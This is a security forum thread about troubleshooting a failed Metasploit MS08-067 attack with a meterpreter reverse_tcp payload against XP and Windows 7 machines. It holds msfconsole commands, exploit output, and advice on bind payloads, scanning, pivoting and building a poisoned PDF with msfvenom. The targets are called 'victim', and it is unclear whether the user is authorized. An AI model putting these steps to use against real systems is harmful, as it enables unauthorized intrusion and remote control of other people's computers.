I do not understand where the mistake

[Darkcomet]

I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
[*] Started reverse handler on 192.168.1.5:4444
[-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
[*] Exploit completed, but no session was created.
It would be a very pleasant your help exscuse my english.

[strakar]

In what OS are you trying to use that exploit?

Win7 or the xp? Windows 7 is not vulnerable to that exploit and Windows Xp is not vulnerable with that exploit too when patched with update fix "KB9586644".

[legitnick]

I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
[*] Started reverse handler on 192.168.1.5:4444
[-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
[*] Exploit completed, but no session was created.
It would be a very pleasant your help exscuse my english.

Try using bind_tcp and see if you're able to trigger the payload. Are you sure that port 445 is open? Try running

Code:

nmap -A -sS 192.168.1.5

. If the ports are open it could be the firewall preventing you from establishing a reverse connection.

[scottm99]

Although not all modules support it, you might try the check command in msfconsole. This will see if your target is vulnerable to that particular exploit.

[MI1c00k]

You should check if that system is patched or not, disable firewall on Win XP and check if your target - service pack + language pack meets Metasploit module. Use "show targets" command to check. If its not there then create one, MS08_067 is a wonderful example why automatic exploitation tools fails against various service pack and various languages packs. Read detailed HDM description:

cat /opt/framework/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb

and try build your own target as described in exploit body or here:http://www.hack4fun.eu/2010/05/metas...pi-win-xp-svk/

[Darkcomet]

XP and the command check not found..I do not know which exploit to use xp or win7 I would like to experiment and I learned something...Someone can help me..

[scottm99]

Are you fairly new to metasploit, or have you been working with it awhile? If you're a metasploit newbie, you may want to go through the metasploit unleashed tutorial over at Offensive Security--it's a great resource.

If you've been using MSF for awhile, try the following: install an old version of Adobe Reader on your XP target. Then, using msfvenom, build a poison pdf with an exploit targeting the vulnerable version of Adobe Reader. Run the poison pdf on your target, and see if you get a shell, meterpreter session, or whatever payload you encoded in the pdf.

[Darkcomet]

The computer central not have win xp but have win7 . . May be the reason? to switch to the computer with XP I must first go from the central computer that has win7?Tell me if you can be the reason?

[scottm99]

Not sure what you're saying, but it sounds like you're referring to pivoting (i.e. gaining control of an xp machine first, then going from that to win7). Do you have 2 targets you're trying to exploit (one PC that has xp, and one PC that has Win7)? If so, you may need to try a different exploit...based on what's installed on your target boxes. Metasploit has several exploits available for older versions of Adobe Reader; give one of those a try. You can use a process similar to what I described above.

[Darkcomet]

Thank you for answer.Let me ask you only this. I have 4 PC 1 xp and 3 with win7. . I think that I can not come with a xp exploit, because the main computer has win7.May be the reason?